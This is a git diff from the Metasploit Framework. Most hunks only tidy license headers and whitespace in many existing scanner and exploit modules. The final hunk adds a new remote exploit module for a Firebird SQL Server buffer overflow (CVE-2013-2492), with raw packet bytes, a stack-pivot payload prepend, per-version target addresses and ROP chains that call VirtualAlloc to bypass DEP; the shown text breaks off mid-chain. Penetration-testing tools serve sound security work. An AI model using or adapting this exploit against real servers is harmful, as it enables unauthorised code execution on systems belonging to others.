b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb index fc16c07d50..1c054168e2 100644 --- a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb +++ b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb @@ -1,4 +1,10 @@ ## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' require 'rex/proto/natpmp' diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb index 988eeffe29..7b23bb9872 100644 --- a/modules/auxiliary/scanner/ntp/ntp_readvar.rb +++ b/modules/auxiliary/scanner/ntp/ntp_readvar.rb @@ -1,7 +1,9 @@ +## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/ +# http://metasploit.com/ +## require 'msf/core' diff --git a/modules/auxiliary/scanner/oracle/isqlplus_login.rb b/modules/auxiliary/scanner/oracle/isqlplus_login.rb index 150d6a5463..261703c0ff 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_login.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_login.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/Framework/ +# http://metasploit.com/Framework/ ## require 'msf/core' diff --git a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb index a4b51ffa92..5d5fe96ee5 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/Framework/ +# http://metasploit.com/Framework/ ## require 'msf/core' diff --git a/modules/auxiliary/scanner/sap/sap_icf_public_info.rb b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb index 2095bef790..f7f1a64a6d 100644 --- a/modules/auxiliary/scanner/sap/sap_icf_public_info.rb +++ b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## @@ -152,4 +152,4 @@ class Metasploit4 < Msf::Auxiliary print(@saptbl.to_s) end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/sap/sap_router_info_request.rb b/modules/auxiliary/scanner/sap/sap_router_info_request.rb index af2c9c6500..46d50232b0 100644 --- a/modules/auxiliary/scanner/sap/sap_router_info_request.rb +++ b/modules/auxiliary/scanner/sap/sap_router_info_request.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb index 564bfdddc7..da586bae41 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb index b1e1c552ad..ef53dfc051 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb index 3bf02feb67..f06ae9ab71 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb index 0537944da0..ceb214a8b6 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## @@ -158,4 +158,4 @@ class Metasploit4 < Msf::Auxiliary return end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb index d0690058bb..2821857488 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb index e188879c66..fface84f17 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb index 5f8cc3be61..be9eee6db6 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb index 263a001a6f..5f1363b84e 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb index d68877559a..338a670638 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## @@ -122,4 +122,4 @@ class Metasploit4 < Msf::Auxiliary return end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 21100734ee..dca1f8c607 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb index a3223710ca..d0fddc6510 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb index 4210baed98..bc42ac7f18 100644 --- a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## ## diff --git a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb index ca6c2f5c2f..4029bc6a3d 100644 --- a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb +++ b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb @@ -1,4 +1,9 @@ -#!/usr/bin/env ruby +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index 080803918b..fd365467c6 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -1,12 +1,8 @@ -## -# $Id:$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index b646e33607..a973f9e6ff 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -1,3 +1,11 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + + require 'msf/core' require 'net/dns' require 'resolv' diff --git a/modules/encoders/x86/bloxor.rb b/modules/encoders/x86/bloxor.rb index a2577bc89f..2dd6508a68 100644 --- a/modules/encoders/x86/bloxor.rb +++ b/modules/encoders/x86/bloxor.rb @@ -1,12 +1,8 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -14,15 +10,15 @@ require 'rex/encoder/bloxor/bloxor' # # BloXor is a cross architecture metamorphic block based xor encoder/decoder for Metasploit. -# BloXor was inspired by the Shikata Ga Nai encoder (./msf/modules/encoders/x86/shikata_ga_nai.rb) +# BloXor was inspired by the Shikata Ga Nai encoder (./msf/modules/encoders/x86/shikata_ga_nai.rb) # by spoonm and the Rex::Poly::Block (./msf/lib/rex/poly/block.rb) code by skape. # # Please refer to ./msf/lib/rex/encoder/bloxor/bloxor.rb for BloXor's implementation and to # ./msf/lib/rex/poly/machine/machine.rb and ./msf/lib/rex/poly/machine/x86.rb for the # backend metamorphic stuff. # -# A presentation at AthCon 2012 by Dimitrios A. Glynos called 'Packing Heat!' discusses a -# metamorphic packer for PE executables and also uses METASM. I am unaware of any code having +# A presentation at AthCon 2012 by Dimitrios A. Glynos called 'Packing Heat!' discusses a +# metamorphic packer for PE executables and also uses METASM. I am unaware of any code having # been publicly released for this, so am unable to compare implementations. # http://census-labs.com/media/packing-heat.pdf # @@ -39,7 +35,6 @@ class Metasploit3 < Rex::Encoder::BloXor def initialize super( 'Name' => 'BloXor - A Metamorphic Block Based XOR Encoder', - 'Version' => '$Revision$', 'Description' => 'A Metamorphic Block Based XOR Encoder.', 'Author' => [ 'sf' ], 'Arch' => ARCH_X86, @@ -47,12 +42,12 @@ class Metasploit3 < Rex::Encoder::BloXor 'EncoderType' => Msf::Encoder::Type::Unspecified ) end - + def compute_decoder( state ) - + @machine = Rex::Poly::MachineX86.new( state.badchars ) - + super( state ) end - + end diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index c1840dcc11..ab1b05752e 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index 2853947ced..1ce1814d7b 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/projects/framework/ +# http://metasploit.com/projects/framework/ ## require 'msf/core' diff --git a/modules/exploits/multi/http/jboss_invoke_deploy.rb b/modules/exploits/multi/http/jboss_invoke_deploy.rb index 1d2ffc92ce..ac4e65ebb7 100644 --- a/modules/exploits/multi/http/jboss_invoke_deploy.rb +++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index bd825a7a00..11571e816a 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/multi/misc/indesign_server_soap.rb b/modules/exploits/multi/misc/indesign_server_soap.rb index 514dfd3fb4..e1eac3bc1d 100644 --- a/modules/exploits/multi/misc/indesign_server_soap.rb +++ b/modules/exploits/multi/misc/indesign_server_soap.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb index ef6906721e..0920ef652d 100644 --- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/windows/browser/java_ws_vmargs.rb b/modules/exploits/windows/browser/java_ws_vmargs.rb index 105bc4dca4..cc437a1280 100644 --- a/modules/exploits/windows/browser/java_ws_vmargs.rb +++ b/modules/exploits/windows/browser/java_ws_vmargs.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb index a1e822774c..f413dc0312 100644 --- a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb +++ b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb index 52b05457f3..66f9e24372 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_launch.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb b/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb index 2f19c28d1f..66799d51fe 100644 --- a/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb +++ b/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb index 443b575891..4599847eae 100644 --- a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb +++ b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index 1e678f874d..4cc05527a1 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/ +# http://metasploit.com/ ## require 'msf/core' diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 1fcbdd7574..1b231519e3 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index 62717522be..b56b032c19 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb index 8ebed8a823..a1397edd51 100644 --- a/modules/exploits/windows/local/current_user_psexec.rb +++ b/modules/exploits/windows/local/current_user_psexec.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb new file mode 100644 index 0000000000..3763fa6058 --- /dev/null +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -0,0 +1,241 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + include Msf::Exploit::Remote::Tcp + + def initialize + super( + 'Name' => 'Firebird Relational Database CNCT Group Number Buffer Overflow', + 'Description' => %q{ + This module exploits a vulnerability in Firebird SQL Server. A specially + crafted packet can be sent which will overwrite a pointer allowing the attacker to + control where data is read from. Shortly, following the controlled read, the + pointer is called resulting in code execution. + + The vulnerability exists with a group number extracted from the CNCT information, + which is sent by the client, and whose size is not properly checked. + + This module uses an existing call to memcpy, just prior to the vulnerable code, + which allows a small amount of data to be written to the stack. A two-phases + stackpivot allows to execute the ROP chain which ultimately is used to execute + VirtualAlloc and bypass DEP. + }, + 'Author' => 'Spencer McIntyre', + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'References' => + [ + [ 'CVE', '2013-2492' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'seh' + }, + 'Payload' => + { + # Stackpivot => mov eax,fs:[0x18] # add eax,8 # mov esp,[eax] + 'Prepend' => "\x64\xa1\x18\x00\x00\x00\x83\xc0\x08\x8b\x20", + 'Space' => 400, + 'BadChars' => "\x00\x0a\x0d" + }, + 'Targets' => + [ + # pivots are pointers to stack pivots + [ 'Windows FB 2.5.2.26539', { 'pivot' => 0x005ae1fc, 'rop_nop' => 0x005b0384, 'rop_pop' => 0x4a831344 } ], + [ 'Windows FB 2.5.1.26351', { 'pivot' => 0x4add2302, 'rop_nop' => 0x00424a50, 'rop_pop' => 0x00656472 } ], + [ 'Windows FB 2.1.5.18496', { 'pivot' => 0x4ad5df4d, 'rop_nop' => 0x0042ba8c, 'rop_pop' => 0x005763d5 } ], + [ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ] + ], + 'DefaultTarget' => 0, + 'Privileged' => true, + 'DisclosureDate' => 'Jan 31 2013' + ) + + register_options([Opt::RPORT(3050)], self.class) + end + + def check + begin + connect + rescue + return Exploit::CheckCode::Safe + end + + filename = "C:\\#{rand_text_alpha(12)}.fdb" + username = rand_text_alpha(7) + + check_data = "" + check_data << "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24" + check_data << "\x00\x00\x00\x13" + check_data << filename + check_data << "\x00\x00\x00\x00\x04\x00\x00\x00\x24" + check_data << "\x01\x07" << username << "\x04\x15\x6c\x6f\x63\x61\x6c" + check_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e" + check_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02" + check_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01" + check_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b" + check_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06" + check_data << "\xff\xff\x80\x0c\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05" + check_data << "\x00\x00\x00\x08" + + sock.put(check_data) + data = sock.recv(16) + disconnect + + opcode = data.unpack("N*")[0] + version = data.unpack("N*")[1] + if opcode == 3 # Accept + if [ 0xffff800b, 0xffff800c ].include?(version) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Unknown + end + + def stack_pivot_rop_chain + case target.name + when 'Windows FB 2.5.2.26539' + rop_chain = [ + 0x005e1ea4, # MOV EAX,EDI # RETN [fbserver.exe] + 0x0059ffeb, # POP EBP # RETN [fbserver.exe] + 0x0000153c, # 0x0000153c-> ebp + 0x005d261f, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe] + 0x0059fe1f, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe] + ].pack("V*") + when 'Windows FB 2.5.1.26351' + rop_chain = [ + 0x005e1ab8, # MOV EAX,EDI # RETN [fbserver.exe] + 0x0059650b, # POP EBP # RETN [fbserver.exe] + 0x0000153c, # 0x0000153c-> ebp + 0x005cf6ff, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe] + 0x0059a3db, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe] + ].pack("V*") + when 'Windows FB 2.1.5.18496' + rop_chain = [ + 0x0055b844, # MOV EAX,EDI # RETN [fbserver.exe] + 0x4a86ee77, # POP ECX # RETN [icuuc30.dll] + 0x000001c0, # 0x000001c0-> ebp + 0x005aee63, # ADD EAX,ECX # RETN [fbserver.exe] + 0x4a82d326, # XCHG EAX,ESP # RETN [icuuc30.dll] + ].pack("V*") + when 'Debug' + rop_chain = [ ].fill(0x41414141, 0..5).pack("V*") + end + return rop_chain + end + + def final_rop_chain + # all rop chains in here created with mona.py, thanks corelan! + case target.name + when 'Windows FB 2.5.2.26539' + rop_chain = [ + 0x4a831344, # POP ECX # RETN [icuuc30.dll] + 0x0065f16c, # ptr to &VirtualAlloc() [IAT fbserver.exe] + 0x005989f0, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe] + 0x004666a6, # XCHG EAX,ESI # RETN [fbserver.exe] + 0x00431905, # POP EBP # RETN [fbserver.exe] + 0x00401932, # & push esp # ret [fbserver.exe] + 0x4a844ac0, # POP EBX # RETN [icuuc30.dll] + 0x00001000, # 0x00001000-> ebx + 0x4a85bfee, # POP EDX # RETN [icuuc30.dll] + 0x00001000, # 0x00001000-> edx + 0x005dae9e, # POP ECX # RETN [fbserver.exe] + 0x00000040, # 0x00000040-> ecx + 0x0057a822, # POP EDI # RETN [fbserver.exe] + 0x005b0384, # RETN (ROP NOP) [fbserver.exe] + 0x0046f8c3, # POP EAX # RETN [fbserver.exe] + 0x90909090, # nop + 0x00586002, # PUSHAD # RETN [fbserver.exe] + ].pack("V*") + when 'Windows FB 2.5.1.26351' + rop_chain = [ + 0x00656472, # POP ECX # RETN [fbserver.exe] + 0x0065b16c, # ptr to &VirtualAlloc() [IAT fbserver.exe] + 0x00410940, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe] + 0x0063be76, # XCHG EAX,ESI # RETN [fbserver.exe] + 0x0041d1ae, # POP EBP # RETN [fbserver.exe] + 0x0040917f, # & call esp [fbserver.exe] + 0x4a8589c0, # POP EBX # RETN [icuuc30.dll] + 0x00001000, # 0x00001000-> ebx + 0x4a864cc3, # POP EDX # RETN [icuuc30.dll] + 0x00001000, # 0x00001000-> edx + 0x0064ef59, # POP ECX # RETN [fbserver.exe] + 0x00000040, # 0x00000040-> ecx + 0x005979fa, # POP EDI # RETN [fbserver.exe] + 0x00424a50, # RETN (ROP NOP) [fbserver.exe] + 0x4a86052d, # POP EAX # RETN [icuuc30.dll] + 0x90909090, # nop + 0x005835f2, # PUSHAD # RETN [fbserver.exe] + ].pack("V*") + when 'Windows FB 2.1.5.18496' + rop_chain = [ + 0x005763d5, # POP EAX # RETN [fbserver.exe] + 0x005ce120, # ptr to &VirtualAlloc() [IAT fbserver.exe] + 0x004865a4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [fbserver.exe] + 0x004cf4f6, # XCHG EAX,ESI # RETN [fbserver.exe] + 0x004e695a, # POP EBP # RETN [fbserver.exe] + 0x004d9e6d, # & jmp esp [fbserver.exe] + 0x4a828650, # POP EBX # RETN [icuuc30.dll] + 0x00001000, # 0x00001000-> ebx + 0x4a85bfee, # POP EDX # RETN [icuuc30.dll] + 0x00001000, # 0x00001000-> edx + 